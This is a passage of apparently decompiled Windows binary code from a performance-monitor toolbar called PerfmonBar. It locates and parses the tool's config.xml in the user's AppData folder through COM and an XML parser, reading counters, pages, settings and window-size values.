																																																														goto L585;
																																																													} else {
																																																														_t1081 = _v44;
																																																														__eflags = _t1081;
																																																														if(_t1081 == 0) {
																																																															L589:
																																																															_t964 = E6E7E7D20(0x80004003);
																																																															goto L590;
																																																														} else {
																																																															_t1594 =  *_t1081;
																																																															_t1082 =  *((intOrPtr*)(_t1594 + 0x2c))(_t1081,  &_v56);
																																																															__eflags = _t1082;
																																																															if(_t1082 < 0) {
																																																																goto L584;
																																																															} else {
																																																																_t1083 = 0;
																																																																_v40 = 0;
																																																																_v24 = 4;
																																																																_v100 = 0;
																																																																__eflags = _v56;
																																																																if(_v56 <= 0) {
																																																																	L579:
																																																																	goto L580;
																																																																} else {
																																																																	_t1559 = __imp__#6;
																																																																	while(1) {
																																																																		_t1840 = _v44;
																																																																		__eflags = _t1840;
																																																																		if(_t1840 == 0) {
																																																																			goto L588;
																																																																		}
																																																																		_t1594 =  *_t1840;
																																																																		_t1823 =  *(_t1594 + 0x28);
																																																																		_v24 = 5;
																																																																		__eflags = _t1083;
																																																																		if(_t1083 != 0) {
																																																																			_t1594 =  *_t1083;
																																																																			 *((intOrPtr*)(_t1594 + 8))(_t1083);
																																																																		}
																																																																		_v24 = 4;
																																																																		_v40 = 0;
																																																																		_t1086 =  *_t1823(_t1840, _v100,  &_v40);
																																																																		__eflags = _t1086;
																																																																		if(_t1086 < 0) {
																																																																			L583:
																																																																			_t1083 = _v40;
																																																																			L580:
																																																																			_v24 = 0x11;
																																																																			__eflags = _t1083;
																																																																			if(_t1083 != 0) {
																																																																				 *((intOrPtr*)( *_t1083 + 8))(_t1083);
																																																																			}
																																																																			L585:
																																																																			_v24 = 0x12;
																																																																			_t1634 = _v44;
																																																																			__eflags = _t1634;
																																																																			if(_t1634 != 0) {
																																																																				 *((intOrPtr*)( *_t1634 + 8))(_t1634);
																																																																			}
																																																																			 *[fs:0x0] = _v32;
																																																																			__eflags = _v36 ^ _t1900;
																																																																			return E6E7E440A(_v36 ^ _t1900);
																																																																		} else {
																																																																			_v52 = 0;
																																																																			_v24 = 8;
																																																																			_t1087 = _v40;
																																																																			__eflags = _t1087;
																																																																			if(_t1087 == 0) {
																																																																				goto L588;
																																																																			} else {
																																																																				_t1594 =  *_t1087;
																																																																				_t1088 =  *((intOrPtr*)(_t1594 + 0x1c))(_t1087,  &_v52);
																																																																				__eflags = _t1088;
																																																																				if(_t1088 < 0) {
																																																																					L582:
																																																																					 *_t1559(_v52);
																																																																					goto L583;
																																																																				} else {
																																																																					_t1090 = _v40;
																																																																					__eflags = _t1090;
																																																																					if(_t1090 == 0) {
																																																																						goto L588;
																																																																					} else {
																																																																						_t1808 =  &_v92;
																																																																						__eflags =  *((intOrPtr*)( *_t1090 + 0x20))(_t1090,  &_v92);
																																																																						if(__eflags < 0) {
																																																																							goto L582;
																																																																						} else {
																																																																							_t1594 =  &_v48;
																																																																							_v48 = 0;
																																																																							E6E7D8390(_t1594,  &_v92, __eflags, _v52);
																																																																							_v24 = 0xd;
																																																																							__imp__#8( &_v76);
																																																																							_t964 =  &_v76;
																																																																							__imp__#10(_t964,  &_v92);
																																																																							__eflags = _t964;
																																																																							if(__eflags < 0) {
																																																																								L590:
																																																																								E6E7E7D20(_t964);
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								_t1560 = _t1922;
																																																																								_t1925 = (_t1922 - 0x00000008 & 0xfffffff8) + 4;
																																																																								_v800 =  *((intOrPtr*)(_t1560 + 4));
																																																																								_t1902 = _t1925;
																																																																								_t967 =  *0x6e81e008; // 0x77dcee0d
																																																																								_t968 = _t967 ^ _t1902;
																																																																								_v824 = _t968;
																																																																								 *[fs:0x0] =  &_v816;
																																																																								_t1842 = _t1594;
																																																																								_v1352 = _t1842;
																																																																								E6E7E8BE0(_t1823,  &_v1348, 0, 0x208);
																																																																								_t1927 = _t1925 - 0x258 + 0xc;
																																																																								_t972 =  &_v1348;
																																																																								__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t972, _t968, _t1823, _t1840, _t1560,  *[fs:0x0], E6E808EFB, 0xffffffff, _t1900, _t1559);
																																																																								__eflags = _t972;
																																																																								if(_t972 < 0) {
																																																																									L608:
																																																																									 *[fs:0x0] = _v44;
																																																																									__eflags = _v52 ^ _t1902;
																																																																									return E6E7E440A(_v52 ^ _t1902);
																																																																								} else {
																																																																									__eflags = 0;
																																																																									_v592 = 0;
																																																																									_t1599 =  &_v576;
																																																																									_v588 = 7;
																																																																									_v608 = 0;
																																																																									_t1795 = _t1599 + 2;
																																																																									do {
																																																																										_t975 =  *_t1599;
																																																																										_t1599 = _t1599 + 2;
																																																																										__eflags = _t975;
																																																																									} while (_t975 != 0);
																																																																									_push(_t1599 - _t1795 >> 1);
																																																																									E6E7DBC80(_t1560,  &_v608, _t1823, _t1842, _t1975,  &_v576);
																																																																									_v36 = 0;
																																																																									_t1796 = _v588;
																																																																									_t1603 = _v592;
																																																																									__eflags = _t1796 - _t1603 - 0x16;
																																																																									if(_t1796 - _t1603 < 0x16) {
																																																																										_push(0x16);
																																																																										_v580 = 0;
																																																																										_t980 = E6E7DD150(_t1560,  &_v608, _t1823, _t1842, 0x16, _v580, L"\\PerfmonBar\\config.xml");
																																																																									} else {
																																																																										__eflags = _t1796 - 8;
																																																																										_t1852 =  >=  ? _v608 :  &_v608;
																																																																										_t1823 = _t1603 + 0x16;
																																																																										_v592 = _t1823;
																																																																										E6E7E9330(_t1852 + _t1603 * 2, L"\\PerfmonBar\\config.xml", 0x2c);
																																																																										_t1927 = _t1927 + 0xc;
																																																																										 *((short*)(_t1852 + _t1823 * 2)) = 0;
																																																																										_t980 =  &_v608;
																																																																										_t1842 = _v580;
																																																																									}
																																																																									asm("movups xmm0, [eax]");
																																																																									asm("movups [ebp-0x268], xmm0");
																																																																									asm("movups [ebp-0x258], xmm0");
																																																																									asm("movq xmm0, [eax+0x10]");
																																																																									 *(_t980 + 0x10) = 0;
																																																																									 *(_t980 + 0x14) = 7;
																																																																									 *_t980 = 0;
																																																																									asm("movq [ebp-0x228], xmm0");
																																																																									asm("movq [ebp-0x248], xmm0");
																																																																									__eflags = _t1842 -  &_v632;
																																																																									if(_t1842 ==  &_v632) {
																																																																										_t1797 = _v612;
																																																																										__eflags = _t1797 - 8;
																																																																										if(_t1797 < 8) {
																																																																											goto L603;
																																																																										} else {
																																																																											_t1632 = _v632;
																																																																											_t1803 = 2 + _t1797 * 2;
																																																																											_t1068 = _t1632;
																																																																											__eflags = _t1803 - 0x1000;
																																																																											if(_t1803 < 0x1000) {
																																																																												L602:
																																																																												_push(_t1803);
																																																																												E6E7E441B(_t1632);
																																																																												_t1927 = _t1927 + 8;
																																																																												goto L603;
																																																																											} else {
																																																																												_t1606 =  *((intOrPtr*)(_t1632 - 4));
																																																																												_t1799 = _t1803 + 0x23;
																																																																												__eflags = _t1068 - _t1606 + 0xfffffffc - 0x1f;
																																																																												if(__eflags > 0) {
																																																																													E6E7EE5E6(_t1560, _t1606, _t1799, _t1823, __eflags);
																																																																													goto L610;
																																																																												} else {
																																																																													goto L602;
																																																																												}
																																																																											}
																																																																										}
																																																																									} else {
																																																																										L132();
																																																																										asm("movups xmm0, [ebp-0x268]");
																																																																										asm("movups [esi], xmm0");
																																																																										asm("movq xmm0, [ebp-0x228]");
																																																																										asm("movq [esi+0x10], xmm0");
																																																																										L603:
																																																																										_t1798 = _v588;
																																																																										__eflags = _t1798 - 8;
																																																																										if(_t1798 < 8) {
																																																																											L607:
																																																																											__eflags = 0;
																																																																											goto L608;
																																																																										} else {
																																																																											_t1606 = _v608;
																																																																											_t1799 = 2 + _t1798 * 2;
																																																																											_t983 = _t1606;
																																																																											__eflags = _t1799 - 0x1000;
																																																																											if(_t1799 < 0x1000) {
																																																																												L606:
																																																																												_push(_t1799);
																																																																												E6E7E441B(_t1606);
																																																																												goto L607;
																																																																											} else {
																																																																												_t1606 =  *((intOrPtr*)(_t1606 - 4));
																																																																												_t1799 = _t1799 + 0x23;
																																																																												__eflags = _t983 - _t1606 + 0xfffffffc - 0x1f;
																																																																												if(__eflags > 0) {
																																																																													L610:
																																																																													E6E7EE5E6(_t1560, _t1606, _t1799, _t1823, __eflags);
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													_push(_t1560);
																																																																													_t1562 = _t1927;
																																																																													_t1933 = (_t1927 - 0x00000008 & 0xfffffff8) + 4;
																																																																													_push(_t1902);
																																																																													_v1468 =  *((intOrPtr*)(_t1562 + 4));
																																																																													_t1905 = _t1933;
																																																																													_push(0xffffffff);
																																																																													_push(E6E808F70);
																																																																													_push( *[fs:0x0]);
																																																																													_push(_t1562);
																																																																													_t1934 = _t1933 - 0x50;
																																																																													_t989 =  *0x6e81e008; // 0x77dcee0d
																																																																													_t990 = _t989 ^ _t1905;
																																																																													_v1492 = _t990;
																																																																													_push(_t1842);
																																																																													_push(_t1823);
																																																																													_push(_t990);
																																																																													_t991 =  &_v1484;
																																																																													 *[fs:0x0] = _t991;
																																																																													_t1844 = _t1606;
																																																																													_v1500 = _t1844;
																																																																													__eflags =  *0x6e8204d8;
																																																																													if( *0x6e8204d8 == 0) {
																																																																														__imp__CoInitialize(0);
																																																																														__eflags = _t991;
																																																																														_t1799 =  >=  ? 1 :  *0x6e8204d8 & 0x000000ff;
																																																																														 *0x6e8204d8 =  >=  ? 1 :  *0x6e8204d8 & 0x000000ff;
																																																																													}
																																																																													_v48 = 0;
																																																																													E6E7DBA60(_t1562, _t1844 + 4, _t1799, _t1975);
																																																																													__eflags =  *((intOrPtr*)(_t1844 + 0x14)) -  *((intOrPtr*)(_t1844 + 0xc)) >> 2 - 0x10;
																																																																													if( *((intOrPtr*)(_t1844 + 0x14)) -  *((intOrPtr*)(_t1844 + 0xc)) >> 2 < 0x10) {
																																																																														E6E7DC0A0(_t1844 + 0xc, _t1799, _t1975, 0x10);
																																																																													}
																																																																													_v124 =  *((intOrPtr*)(_t1844 + 4));
																																																																													E6E7DBDD0(_t1562, _t1844 + 0xc, _t1823, _t1844, _t1975, 0x10,  &_v124);
																																																																													_t999 = _t1844 + 0x20;
																																																																													 *(_t1844 + 0x18) = 7;
																																																																													 *(_t1844 + 0x1c) = 8;
																																																																													_t1825 = _t999[1];
																																																																													_t1845 =  *_t999;
																																																																													_v124 = _t999;
																																																																													__eflags = _t1845 - _t1825;
																																																																													if(_t1845 != _t1825) {
																																																																														do {
																																																																															E6E7DBB80(_t1562, _t1845 + 4, _t1825, _t1845, _t1975);
																																																																															_t1845 = _t1845 + 0x10;
																																																																															__eflags = _t1845 - _t1825;
																																																																														} while (_t1845 != _t1825);
																																																																														_t999 = _v124;
																																																																														_t1845 =  *_t999;
																																																																													}
																																																																													_t999[1] = _t1845;
																																																																													_v80 = 0;
																																																																													_t1000 =  &_v116;
																																																																													_v48 = 2;
																																																																													__imp__CoCreateInstance(0x6e80a3a0, 0, 0x17, 0x6e817bdc, _t1000);
																																																																													_t1846 = _t1000;
																																																																													__eflags = _t1846;
																																																																													if(_t1846 < 0) {
																																																																														L622:
																																																																														_t1001 = 0;
																																																																														_v80 = 0;
																																																																														__eflags = _t1846;
																																																																														if(_t1846 >= 0) {
																																																																															goto L624;
																																																																														} else {
																																																																															_v117 = 0;
																																																																															goto L674;
																																																																														}
																																																																													} else {
																																																																														__imp__OleRun(_v116);
																																																																														_t1846 = _t1000;
																																																																														__eflags = _t1846;
																																																																														if(_t1846 >= 0) {
																																																																															_t1628 = _v116;
																																																																															_t1801 =  &_v80;
																																																																															_t1846 =  *((intOrPtr*)( *_t1628))(_t1628, 0x6e817bcc,  &_v80);
																																																																														}
																																																																														_t1062 = _v116;
																																																																														 *((intOrPtr*)( *_t1062 + 8))(_t1062);
																																																																														__eflags = _t1846;
																																																																														if(_t1846 >= 0) {
																																																																															L624:
																																																																															_v96 = 0;
																																																																															_v92 = 7;
																																																																															_v112 = 0;
																																																																															_v48 = 5;
																																																																															L591();
																																																																															__eflags = 0;
																																																																															if(0 != 0) {
																																																																																L668:
																																																																																_v117 = 0;
																																																																																goto L669;
																																																																															} else {
																																																																																_t1846 = _v80;
																																																																																__eflags = _t1846;
																																																																																if(__eflags == 0) {
																																																																																	L677:
																																																																																	E6E7E7D20(0x80004003);
																																																																																	goto L678;
																																																																																} else {
																																																																																	__eflags = _v92 - 8;
																																																																																	_t1825 =  >=  ? _v112 :  &_v112;
																																																																																	_v124 =  *((intOrPtr*)( *_t1846 + 0xe8));
																																																																																	_v140 = 8;
																																																																																	__imp__#2(_t1825);
																																																																																	_v132 = 8;
																																																																																	__eflags = 8;
																																																																																	if(8 != 0) {
																																																																																		L628:
																																																																																		_v48 = 7;
																																																																																		asm("movups xmm0, [ebp-0x60]");
																																																																																		_t1934 = _t1934 - 0x10;
																																																																																		asm("movups [eax], xmm0");
																																																																																		_t1846 = _v124(_t1846,  &_v88);
																																																																																		__imp__#9( &_v140);
																																																																																		__eflags = _t1846;
																																																																																		if(_t1846 != 0) {
																																																																																			goto L668;
																																																																																		} else {
																																																																																			_v76 = _t1846;
																																																																																			_v48 = 9;
																																																																																			_t1031 = _v80;
																																																																																			__eflags = _t1031;
																																																																																			if(__eflags == 0) {
																																																																																				goto L679;
																																																																																			} else {
																																																																																				_t1615 =  *_t1031;
																																																																																				_t1801 =  &_v76;
																																																																																				_v48 = 9;
																																																																																				_v76 = _t1846;
																																																																																				_t1032 = _t1615[0x2d](_t1031,  &_v76);
																																																																																				__eflags = _t1032;
																																																																																				if(_t1032 >= 0) {
																																																																																					_v84 = 0;
																																																																																					_v48 = 0xd;
																																																																																					_t1033 = _v76;
																																																																																					__eflags = _t1033;
																																																																																					if(__eflags == 0) {
																																																																																						goto L680;
																																																																																					} else {
																																																																																						_t1801 =  &_v84;
																																																																																						_t1034 =  *((intOrPtr*)( *_t1033 + 0x1c))(_t1033,  &_v84);
																																																																																						_t1846 = __imp__#6;
																																																																																						__eflags = _t1034;
																																																																																						if(_t1034 >= 0) {
																																																																																							_t1615 =  &_v84;
																																																																																							_t1035 = E6E7D8220(_t1562, _t1615, _t1825, _t1846, "perfbar");
																																																																																							__eflags = _t1035;
																																																																																							if(_t1035 == 0) {
																																																																																								L659:
																																																																																								_v117 = 1;
																																																																																								goto L660;
																																																																																							} else {
																																																																																								_v68 = 0;
																																																																																								_v48 = 0x10;
																																																																																								_t1846 = _v76;
																																																																																								__eflags = _t1846;
																																																																																								if(__eflags == 0) {
																																																																																									goto L681;
																																																																																								} else {
																																																																																									_t1039 =  *_t1846;
																																																																																									_t1615 =  &_v68;
																																																																																									_t1825 =  *(_t1039 + 0x34);
																																																																																									L683();
																																																																																									 *( *(_t1039 + 0x34))(_t1846, _t1039);
																																																																																									_t1041 = _v68;
																																																																																									_t1846 = __imp__#6;
																																																																																									__eflags = _t1041;
																																																																																									if(_t1041 == 0) {
																																																																																										L657:
																																																																																										_v48 = 0x1e;
																																																																																										__eflags = _t1041;
																																																																																										if(_t1041 != 0) {
																																																																																											 *((intOrPtr*)( *_t1041 + 8))(_t1041);
																																																																																										}
																																																																																										goto L659;
																																																																																									} else {
																																																																																										_t1825 = _v72;
																																																																																										while(1) {
																																																																																											_v116 = 0;
																																																																																											_v48 = 0x11;
																																																																																											__eflags = _t1041;
																																																																																											if(__eflags == 0) {
																																																																																												goto L677;
																																																																																											}
																																																																																											_t1801 =  &_v116;
																																																																																											_t1043 =  *((intOrPtr*)( *_t1041 + 0x1c))(_t1041,  &_v116);
																																																																																											__eflags = _t1043;
																																																																																											if(_t1043 < 0) {
																																																																																												L665:
																																																																																												 *_t1846(_v116);
																																																																																												_v48 = 0x18;
																																																																																												_t1045 = _v68;
																																																																																												__eflags = _t1045;
																																																																																												if(_t1045 != 0) {
																																																																																													 *((intOrPtr*)( *_t1045 + 8))(_t1045);
																																																																																												}
																																																																																												_v117 = 0;
																																																																																												goto L660;
																																																																																											} else {
																																																																																												_t1047 = E6E7D8220(_t1562,  &_v116, _t1825, _t1846, "counters");
																																																																																												__eflags = _t1047;
																																																																																												if(_t1047 == 0) {
																																																																																													_t1048 = E6E7D8220(_t1562,  &_v116, _t1825, _t1846, "pages");
																																																																																													__eflags = _t1048;
																																																																																													if(_t1048 == 0) {
																																																																																														_t1615 =  &_v116;
																																																																																														_t1049 = E6E7D8220(_t1562, _t1615, _t1825, _t1846, "settings");
																																																																																														__eflags = _t1049;
																																																																																														if(_t1049 != 0) {
																																																																																															_t1801 = _t1825 + 0x2c;
																																																																																															_t1615 =  &_v68;
																																																																																															L509();
																																																																																														}
																																																																																													} else {
																																																																																														_t1801 = _t1825 + 0x20;
																																																																																														_t1615 =  &_v68;
																																																																																														E6E7D8F80(_t1562, _t1615, _t1825 + 0x20, _t1825, _t1846, _t1975);
																																																																																													}
																																																																																												} else {
																																																																																													_t1801 = _t1825;
																																																																																													_t1615 =  &_v68;
																																																																																													E6E7D8BD0(_t1562, _t1615, _t1825, _t1825, _t1846, _t1975);
																																																																																												}
																																																																																												_v72 = 0;
																																																																																												_v48 = 0x15;
																																																																																												_t1050 = _v68;
																																																																																												__eflags = _t1050;
																																																																																												if(__eflags == 0) {
																																																																																													goto L677;
																																																																																												} else {
																																																																																													_t1615 =  *_t1050;
																																																																																													_t1801 =  &_v72;
																																																																																													_v48 = 0x15;
																																																																																													_v72 = 0;
																																																																																													_t1051 = _t1615[0x10](_t1050,  &_v72);
																																																																																													__eflags = _t1051;
																																																																																													if(_t1051 < 0) {
																																																																																														_v48 = 0x17;
																																																																																														_t1052 = _v72;
																																																																																														__eflags = _t1052;
																																																																																														if(_t1052 != 0) {
																																																																																															 *((intOrPtr*)( *_t1052 + 8))(_t1052);
																																																																																														}
																																																																																														goto L665;
																																																																																													} else {
																																																																																														_t1850 = _v68;
																																																																																														_t1054 = _v72;
																																																																																														__eflags = _t1850 - _t1054;
																																																																																														if(_t1850 != _t1054) {
																																																																																															_v68 = _t1054;
																																																																																															_v48 = 0x1c;
																																																																																															__eflags = _t1054;
																																																																																															if(_t1054 != 0) {
																																																																																																_t1615 =  *_t1054;
																																																																																																_t1615[1](_t1054);
																																																																																																_t1054 = _v72;
																																																																																															}
																																																																																															_v48 = 0x1b;
																																																																																															__eflags = _t1850;
																																																																																															if(_t1850 != 0) {
																																																																																																 *((intOrPtr*)( *_t1850 + 8))(_t1850);
																																																																																																_t1054 = _v72;
																																																																																															}
																																																																																														}
																																																																																														_v48 = 0x1d;
																																																																																														__eflags = _t1054;
																																																																																														if(_t1054 != 0) {
																																																																																															_t1615 =  *_t1054;
																																																																																															_t1615[2](_t1054);
																																																																																														}
																																																																																														_t1846 = __imp__#6;
																																																																																														 *_t1846(_v116);
																																																																																														_t1041 = _v68;
																																																																																														__eflags = _t1041;
																																																																																														if(_t1041 != 0) {
																																																																																															continue;
																																																																																														} else {
																																																																																															goto L657;
																																																																																														}
																																																																																													}
																																																																																												}
																																																																																											}
																																																																																											goto L686;
																																																																																										}
																																																																																										goto L677;
																																																																																									}
																																																																																								}
																																																																																							}
																																																																																						} else {
																																																																																							_v117 = 0;
																																																																																							L660:
																																																																																							 *_t1846(_v84);
																																																																																							goto L661;
																																																																																						}
																																																																																					}
																																																																																				} else {
																																																																																					_v117 = 0;
																																																																																					L661:
																																																																																					_v48 = 0x1f;
																																																																																					_t1037 = _v76;
																																																																																					__eflags = _t1037;
																																																																																					if(_t1037 != 0) {
																																																																																						 *((intOrPtr*)( *_t1037 + 8))(_t1037);
																																																																																					}
																																																																																					L669:
																																																																																					_v48 = 1;
																																																																																					_t1800 = _v92;
																																																																																					__eflags = _t1800 - 8;
																																																																																					if(_t1800 < 8) {
																																																																																						L673:
																																																																																						__eflags = 0;
																																																																																						_v96 = 0;
																																																																																						_v112 = 0;
																																																																																						_t1001 = _v80;
																																																																																						_v92 = 7;
																																																																																						L674:
																																																																																						_v48 = 0x20;
																																																																																						__eflags = _t1001;
																																																																																						if(_t1001 != 0) {
																																																																																							 *((intOrPtr*)( *_t1001 + 8))(_t1001);
																																																																																						}
																																																																																						 *[fs:0x0] = _v56;
																																																																																						__eflags = _v64 ^ _t1905;
																																																																																						return E6E7E440A(_v64 ^ _t1905);
																																																																																					} else {
																																																																																						_t1615 = _v112;
																																																																																						_t1801 = 2 + _t1800 * 2;
																																																																																						_t1007 = _t1615;
																																																																																						__eflags = _t1801 - 0x1000;
																																																																																						if(_t1801 < 0x1000) {
																																																																																							L672:
																																																																																							_push(_t1801);
																																																																																							E6E7E441B(_t1615);
																																																																																							goto L673;
																																																																																						} else {
																																																																																							_t1615 =  *(_t1615 - 4);
																																																																																							_t1801 = _t1801 + 0x23;
																																																																																							__eflags = _t1007 - _t1615 + 0xfffffffc - 0x1f;
																																																																																							if(__eflags > 0) {
																																																																																								goto L682;
																																																																																							} else {
																																																																																								goto L672;
																																																																																							}
																																																																																						}
																																																																																					}
																																																																																				}
																																																																																			}
																																																																																		}
																																																																																	} else {
																																																																																		__eflags = _t1825;
																																																																																		if(__eflags != 0) {
																																																																																			L678:
																																																																																			E6E7E7D20(0x8007000e);
																																																																																			L679:
																																																																																			E6E7E7D20(0x80004003);
																																																																																			L680:
																																																																																			E6E7E7D20(0x80004003);
																																																																																			L681:
																																																																																			E6E7E7D20(0x80004003);
																																																																																			L682:
																																																																																			E6E7EE5E6(_t1562, _t1615, _t1801, _t1825, __eflags);
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			_push(_t1905);
																																																																																			_push(0xffffffff);
																																																																																			_push(E6E808FA0);
																																																																																			_push( *[fs:0x0]);
																																																																																			_push(_t1846);
																																																																																			_t1013 =  *0x6e81e008; // 0x77dcee0d
																																																																																			_push(_t1013 ^ _t1934);
																																																																																			 *[fs:0x0] =  &_v1608;
																																																																																			_t1848 = _t1615;
																																																																																			_v1600 = 0;
																																																																																			_t1616 =  *_t1848;
																																																																																			__eflags = _t1616;
																																																																																			if(_t1616 != 0) {
																																																																																				 *((intOrPtr*)( *_t1616 + 8))(_t1616);
																																																																																			}
																																																																																			 *_t1848 = 0;
																																																																																			 *[fs:0x0] = _v60;
																																																																																			return _t1848;
																																																																																		} else {
																																																																																			goto L628;
																																																																																		}
																																																																																	}
																																																																																}
																																																																															}
																																																																														} else {
																																																																															goto L622;
																																																																														}
																																																																													}
																																																																												} else {
																																																																													goto L606;
																																																																												}
																																																																											}
																																																																										}
																																																																									}
																																																																								}
																																																																							} else {
																																																																								_v24 = 0xe;
																																																																								_t1095 = E6E7D82F0(_t1559,  &_v104,  &_v92, __eflags, "minSizeX");
																																																																								_t1642 =  &_v48;
																																																																								_t1096 = E6E7D85E0(_t1642, _t1095);
																																																																								_t1854 = _v104;
																																																																								_t1566 = _t1096;
																																																																								__eflags = _t1854;
																																																																								if(_t1854 == 0) {
																																																																									_t1823 = __imp__#6;
																																																																								} else {
																																																																									asm("lock xadd [esi+0x8], ecx");
																																																																									__eflags = (_t1642 | 0xffffffff) != 1;
																																																																									if((_t1642 | 0xffffffff) != 1) {
																																																																										L532:
																																																																										_t1823 = __imp__#6;
																																																																										_v104 = 0;
																																																																									} else {
																																																																										__eflags = _t1854;
																																																																										if(_t1854 == 0) {
																																																																											goto L532;
																																																																										} else {
																																																																											_t1135 =  *_t1854;
																																																																											_t1823 = __imp__#6;
																																																																											__eflags = _t1135;
																																																																											if(_t1135 != 0) {
																																																																												 *_t1823(_t1135);
																																																																												 *_t1854 = 0;
																																																																											}
																																																																											_t1136 =  *(_t1854 + 4);
																																																																											__eflags = _t1136;
																																																																											if(_t1136 != 0) {
																																																																												E6E7E447C(_t1136);
																																																																												_t1922 = _t1922 + 4;
																																																																												 *(_t1854 + 4) = 0;
																																																																											}
																																																																											_push(0xc);
																																																																											E6E7E441B(_t1854);
																																																																											_t1922 = _t1922 + 8;
																																																																											_v104 = 0;
																																																																										}
																																																																									}
																																																																								}
																																																																								__eflags = _t1566;
																																																																								if(__eflags != 0) {
																																																																									_push( &_v76);
																																																																									_t1650 =  &_v108;
																																																																									_t1125 = E6E7D8730(_t1566,  &_v108, _t1808, _t1823, _t1854, _t1975);
																																																																									_v24 = 0xf;
																																																																									_t1859 =  *_t1125;
																																																																									__eflags = _t1859;
																																																																									if(_t1859 == 0) {
																																																																										_t1126 = 0;
																																																																										__eflags = 0;
																																																																									} else {
																																																																										_t1126 =  *(_t1859 + 4);
																																																																										__eflags = _t1126;
																																																																										if(_t1126 == 0) {
																																																																											 *(_t1859 + 4) = E6E7E7D40(_t1566,  *_t1859);
																																																																										}
																																																																									}
																																																																									_t1127 = E6E7F50D9(_t1650, _t1126);
																																																																									_t1922 = _t1922 + 4;
																																																																									_v24 = 0xe;
																																																																									_t1860 = _v108;
																																																																									 *_v116 = _t1127;
																																																																									__eflags = _t1860;
																																																																									if(__eflags != 0) {
																																																																										asm("lock xadd [esi+0x8], eax");
																																																																										__eflags = (_t1127 | 0xffffffff) - 1;
																																																																										if(__eflags == 0) {
																																																																											__eflags = _t1860;
																																																																											if(__eflags != 0) {
																																																																												_t1130 =  *_t1860;
																																																																												__eflags = _t1130;
																																																																												if(_t1130 != 0) {
																																																																													 *_t1823(_t1130);
																																																																													 *_t1860 = 0;
																																																																												}
																																																																												_t1131 =  *(_t1860 + 4);
																																																																												__eflags =  *(_t1860 + 4);
																																																																												if(__eflags != 0) {
																																																																													E6E7E447C(_t1131);
																																																																													_t1922 = _t1922 + 4;
																																																																													 *(_t1860 + 4) = 0;
																																																																												}
																																																																												_push(0xc);
																																																																												E6E7E441B(_t1860);
																																																																												_t1922 = _t1922 + 8;
																																																																											}
																																																																										}
																																																																										_v108 = 0;
																																																																									}
																																																																								}
																																																																								_t1097 = E6E7D82F0(_t1566,  &_v112, _t1808, __eflags, "minSizeY");
																																																																								_t1644 =  &_v48;
																																																																								_t1098 = E6E7D85E0(_t1644, _t1097);
																																																																								_t1855 = _v112;
																																																																								_t1567 = _t1098;
																																																																								__eflags = _t1855;
																																																																								if(_t1855 != 0) {
																																																																									asm("lock xadd [esi+0x8], ecx");
																																																																									__eflags = (_t1644 | 0xffffffff) == 1;
																																																																									if((_t1644 | 0xffffffff) == 1) {
																																																																										__eflags = _t1855;
																																																																										if(_t1855 != 0) {
																																																																											_t1119 =  *_t1855;
																																																																											__eflags = _t1119;
																																																																											if(_t1119 != 0) {
																																																																												 *_t1823(_t1119);
																																																																												 *_t1855 = 0;
																																																																											}
																																																																											_t1120 =  *(_t1855 + 4);
																																																																											__eflags = _t1120;
																																																																											if(_t1120 != 0) {
																																																																												E6E7E447C(_t1120);
																																																																												_t1922 = _t1922 + 4;
																																																																												 *(_t1855 + 4) = 0;
																																																																											}
																																																																											_push(0xc);
																																																																											E6E7E441B(_t1855);
																																																																											_t1922 = _t1922 + 8;
																																																																										}
																																																																									}
																																																																									_v112 = 0;
																																																																								}
																																																																								__eflags = _t1567;
																																																																								if(_t1567 != 0) {
																																																																									_push( &_v76);
																																																																									_t1646 =  &_v120;
																																																																									_t1109 = E6E7D8730(_t1567,  &_v120, _t1808, _t1823, _t1855, _t1975);
																																																																									_v24 = 0x10;
																																																																									_t1857 =  *_t1109;
																																																																									__eflags = _t1857;
																																																																									if(_t1857 == 0) {
																																																																										_t1110 = 0;
																																																																										__eflags = 0;
																																																																									} else {
																																																																										_t1110 =  *(_t1857 + 4);
																																																																										__eflags = _t1110;
																																																																										if(_t1110 == 0) {
																																																																											 *(_t1857 + 4) = E6E7E7D40(_t1567,  *_t1857);
																																																																										}
																																																																									}
																																																																									_t1111 = E6E7F50D9(_t1646, _t1110);
																																																																									_t1922 = _t1922 + 4;
																																																																									_t1858 = _v120;
																																																																									 *(_v116 + 4) = _t1111;
																																																																									__eflags = _t1858;
																																																																									if(_t1858 != 0) {
																																																																										asm("lock xadd [esi+0x8], eax");
																																																																										__eflags = (_t1111 | 0xffffffff) == 1;
																																																																										if((_t1111 | 0xffffffff) == 1) {
																																																																											__eflags = _t1858;
																																																																											if(_t1858 != 0) {
																																																																												_t1114 =  *_t1858;
																																																																												__eflags = _t1114;
																																																																												if(_t1114 != 0) {
																																																																													 *_t1823(_t1114);
																																																																													 *_t1858 = 0;
																																																																												}
																																																																												_t1115 =  *(_t1858 + 4);
																																																																												__eflags = _t1115;
																																																																												if(_t1115 != 0) {
																																																																													E6E7E447C(_t1115);
																																																																													_t1922 = _t1922 + 4;
																																																																													 *(_t1858 + 4) = 0;
																																																																												}
																																																																												_push(0xc);
																																																																												E6E7E441B(_t1858);
																																																																												_t1922 = _t1922 + 8;
																																																																											}
																																																																										}
																																																																										_v120 = 0;
																																																																									}
																																																																								}
																																																																								_t1099 =  &_v76;
																																																																								__imp__#9(_t1099);
																																																																								_t1856 = _v48;
																																																																								__eflags = _t1856;
																																																																								if(_t1856 != 0) {
																																																																									asm("lock xadd [esi+0x8], eax");
																																																																									__eflags = (_t1099 | 0xffffffff) == 1;
																																																																									if((_t1099 | 0xffffffff) == 1) {
																																																																										_t1103 =  *_t1856;
																																																																										__eflags = _t1103;
																																																																										if(_t1103 != 0) {
																																																																											 *_t1823(_t1103);
																																																																											 *_t1856 = 0;
																																																																										}
